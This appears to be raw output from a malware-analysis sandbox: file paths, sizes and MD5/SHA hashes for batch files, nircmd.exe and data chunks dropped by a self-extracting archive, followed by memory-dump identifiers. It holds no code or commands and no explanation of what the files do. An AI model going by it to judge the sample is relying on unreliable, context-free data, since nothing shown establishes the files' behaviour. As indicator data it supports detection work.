SHA51288b01d7b3f76530124f8149668879b9cf66075f228e8c3000d75383bf10c11eb43bd5c83b445b19ec24de578415a26153d3fc0d329b6dd195f09f1226a960ea8
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PkgMgr.00Filesize
28KB
MD5067ab27355743f95929213e08bc60ebb
SHA1376436cef2b119a75cf29500e3efb37061b0fa16
SHA256e621092e9b620bc589a4dd89d791352d266b139ceb9b3f13ddded5b536b52441
SHA51297add0ebcee845d1c47eef6f91d990fccc025509c748e8d612716ac2342144578f4e29247f4824aeefaf5ee143b31837fb5eb487726855ed43a42ccd14431ba0
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PkgMgr.batFilesize
28KB
MD5fed4789f3fbd52e720ae7234600d5652
SHA1273db24c6044f936359bdd272eb14c0fb2f6e117
SHA25603dfd466366ffbe32e9e487cdc2136c62b4b4f57c365e255ef8e0c36991fb8b0
SHA512ff2dc7069ea16bea767b1f9f6efa60b15cef3573a8de5e92d4766646e030f3db89fb4789cf51526b7d10d6d03b1348748d1f7c1162f7382e943261102f6d0435
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cew.00Filesize
344KB
MD59311b831777f14f7c81af8cb67259a3b
SHA18178284b89f5429f4ab6143a652944da563124c2
SHA2561479da32b193676068062236730ce9a5dbcae727ec0eea63b18252f9cb744707
SHA51286d334db1eca671d2af34786337316a6570236ad12c23fa3f84884776d550abcc6403100e17b23b97c761e97dedd8b8b135c4d49332623894c5f57a5e6eb1fc4
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cew.01Filesize
2KB
MD50f92fcbacb68fb014cfa248c31448e6b
SHA164d5dea54df6a03490849d04a174a7e8d690ebb4
SHA2568b2d86fe88a75c0e0c312fdc7d1f54d113d33af729d2be52622f2b538a7a7049
SHA51210f8f0fa7fdaede1b369e35e9bb0cf44ef7de02d4c7c3d644b5c2e80b405f9927acd167c996957e18f0a38fe41be4afdfd420bbe8a539332a93238565576236b
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exeFilesize
44KB
MD5a1cd6a64e8f8ad5d4b6c07dc4113c7ec
SHA160e2f48a51c061bba72a08f34be781354f87aa49
SHA256b994ae5cbfb5ad308656e9a8bf7a4a866fdeb9e23699f89f048d7f92e6bb8577
SHA51287a42901a63793653d49f1c6d410a429cabb470b4c340c4553cbd9eccacb38d8543f85455465e0a432d737e950c590175dad744094861f7c3e575446a65b41e8
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exeFilesize
44KB
MD5a1cd6a64e8f8ad5d4b6c07dc4113c7ec
SHA160e2f48a51c061bba72a08f34be781354f87aa49
SHA256b994ae5cbfb5ad308656e9a8bf7a4a866fdeb9e23699f89f048d7f92e6bb8577
SHA51287a42901a63793653d49f1c6d410a429cabb470b4c340c4553cbd9eccacb38d8543f85455465e0a432d737e950c590175dad744094861f7c3e575446a65b41e8
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.batFilesize
1KB
MD59492f33971cfd6b77484342e42097731
SHA16cce167289894928d4bc6da2e263a354cbe2b174
SHA2562f4637dd7a3125bf60d5651cc851c8ef9cf7c461dd89eed404dd9f5a381844e4
SHA512c685295c91f2765ec3e3ab72fa7c124335d4d570df418427b11c7cd96e3cad5ad8563bc114052de0ecc9d909f671f72663c72015f5415f44c67d24ca21462dcc
-
memory/116-159-0x0000000000000000-mapping.dmp
-
memory/260-158-0x0000000000000000-mapping.dmp
-
memory/332-200-0x0000000000000000-mapping.dmp
-
memory/464-179-0x0000000000000000-mapping.dmp
-
memory/568-182-0x0000000000000000-mapping.dmp
-
memory/640-155-0x0000000000000000-mapping.dmp
-
memory/652-170-0x0000000000000000-mapping.dmp
-
memory/760-149-0x0000000000000000-mapping.dmp
-
memory/1008-166-0x0000000000000000-mapping.dmp
-
memory/1044-181-0x0000000000000000-mapping.dmp
-
memory/1068-197-0x0000000000000000-mapping.dmp
-
memory/1132-185-0x0000000000000000-mapping.dmp
-
memory/1140-167-0x0000000000000000-mapping.dmp
-
memory/1272-191-0x0000000000000000-mapping.dmp
-
memory/1416-150-0x0000000000000000-mapping.dmp
-
memory/1520-180-0x0000000000000000-mapping.dmp
-
memory/1676-198-0x0000000000000000-mapping.dmp
-
memory/1688-143-0x0000000000000000-mapping.dmp
-
memory/1824-199-0x0000000000000000-mapping.dmp
-
memory/1912-154-0x0000000000000000-mapping.dmp
-
memory/2156-164-0x0000000000000000-mapping.dmp
-
memory/2192-165-0x0000000000000000-mapping.dmp
-
memory/2252-140-0x0000000000000000-mapping.dmp
-
memory/2276-138-0x0000000000000000-mapping.dmp
-
memory/2308-163-0x0000000000000000-mapping.dmp
-
memory/2364-130-0x0000000000000000-mapping.dmp
-
memory/2400-162-0x0000000000000000-mapping.dmp
-
memory/2648-161-0x0000000000000000-mapping.dmp
-
memory/2904-189-0x0000000000000000-mapping.dmp
-
memory/2928-186-0x0000000000000000-mapping.dmp
-
memory/3132-201-0x0000000000000000-mapping.dmp
-
memory/3424-188-0x0000000000000000-mapping.dmp
-
memory/3472-172-0x0000000000000000-mapping.dmp
-
memory/3492-187-0x0000000000000000-mapping.dmp
-
memory/3640-196-0x0000000000000000-mapping.dmp
-
memory/3684-195-0x0000000000000000-mapping.dmp
-
memory/4020-153-0x0000000000000000-mapping.dmp
-
memory/4128-168-0x0000000000000000-mapping.dmp
-
memory/4172-174-0x0000000000000000-mapping.dmp
-
memory/4232-202-0x0000000000000000-mapping.dmp
-
memory/4308-169-0x0000000000000000-mapping.dmp
-
memory/4312-171-0x0000000000000000-mapping.dmp
-
memory/4368-184-0x0000000000000000-mapping.dmp
-
memory/4388-190-0x0000000000000000-mapping.dmp
-
memory/4392-183-0x0000000000000000-mapping.dmp
-
memory/4408-147-0x0000000000000000-mapping.dmp
-
memory/4432-152-0x0000000000000000-mapping.dmp
-
memory/4456-177-0x0000000000000000-mapping.dmp
-
memory/4480-194-0x0000000000000000-mapping.dmp
-
memory/4536-160-0x0000000000000000-mapping.dmp
-
memory/4556-146-0x0000000000000000-mapping.dmp
-
memory/4568-176-0x0000000000000000-mapping.dmp
-
memory/4572-175-0x0000000000000000-mapping.dmp
-
memory/4608-178-0x0000000000000000-mapping.dmp
-
memory/4612-148-0x0000000000000000-mapping.dmp
-
memory/4616-156-0x0000000000000000-mapping.dmp
-
memory/4656-157-0x0000000000000000-mapping.dmp
-
memory/4764-145-0x0000000000000000-mapping.dmp
-
memory/4772-192-0x0000000000000000-mapping.dmp
-
memory/4916-193-0x0000000000000000-mapping.dmp
-
memory/5016-173-0x0000000000000000-mapping.dmp
-
memory/5028-151-0x0000000000000000-mapping.dmp
-
memory/5052-141-0x0000000000000000-mapping.dmp
-
memory/5104-139-0x0000000000000000-mapping.dmp